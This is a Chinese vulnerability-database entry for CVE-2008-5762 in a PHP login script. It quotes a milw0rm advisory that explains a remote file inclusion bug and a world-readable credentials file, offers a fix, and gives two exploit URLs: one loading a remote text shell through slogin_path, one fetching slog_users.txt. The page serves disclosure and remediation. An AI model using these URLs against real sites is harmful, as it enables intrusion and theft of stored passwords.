mariovaldez simple_text-file_login_script 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117040 漏洞类型 权限许可和访问控制
发布时间 2008-12-14 更新时间 2008-12-30
CVE编号 CVE-2008-5762 CNNVD-ID CNNVD-200812-485
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7444
https://www.securityfocus.com/bid/84635
https://cxsecurity.com/issue/WLB-2009010004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-485
|漏洞详情
SiTeFiLo是一款简单的基于php的登录认证脚本。SimpleText-FileLoginScript(SiTeFiLo)1.0.6版本在网根下储存敏感信息并未给予足够的访问控制,这会允许远程攻击者可以借助向slog_users.txt提交一个直接的请求,下载数据库文件。
|漏洞EXP
[START]

#########################################################################################
[0x01] Informations:

Script         : Simple Text-File Login script 1.0.6
Download       : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay
Notes          : *

* The name of this login system is Simple Text-File Login script, so we can already 
  understand that this script will use a .txt file to do his job. So it's like if
  the coder didn't think that a login system like this isn't vulnerable. Weird !
  Anyway, it's vulnerable to Remote File Inclusion also, here we are !

#########################################################################################
[0x02] Bug:[Remote File Inclusion]
######

Bugged file is: /[path]/slogin_lib.inc.php

[CODE]
90.  if (!isset ($slogin_path)) {
91.    $slogin_path = "";
92. }
[/CODE]

If $slogin_path is not given, becomes a null variable. Scrolling down the source code,
you can see an include of that variable everywhere.
Just one of the few vulnerable includes:

[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]

FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this:

[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]

The header.inc.php file, such as all the files of this cms, is in the same dir of
slogin_lib.inc.php, so a fix could be just to include the file, without including
a variable, which should be null becouse all the files are in the same dir.

[CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE]


[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

########################################################################################
[0x03] Bug:[Sensitive Data Disclosure]
######

* As I already said, this is not a real bug, becouse is the intention of the author
  to use a .txt file as a login storage. But it's weird, it's unsecure ! Maybe he just 
  sees the goodness of people (hehe xD)

In this login system, sensible datas like username and password are stored in a local
text file , so we can get sensitive information just going to this txt file . The name of
this file is set in slogin_lib.inc.php. By default is: slog_users.txt

[!] EXPLOIT: /[path]/slog_users.txt

#########################################################################################

[/END]

# milw0rm.com [2008-12-14]
|受影响的产品
MarioValdez Simple Text-File Login Script 1.0.6
|参考资料

来源:MILW0RM
名称:7444
链接:http://www.milw0rm.com/exploits/7444
来源:SREASON
名称:4847
链接:http://securityreason.com/securityalert/4847
来源:SECUNIA
名称:33110
链接:http://secunia.com/advisories/33110
来源:OSVDB
名称:50712
链接:http://osvdb.org/50712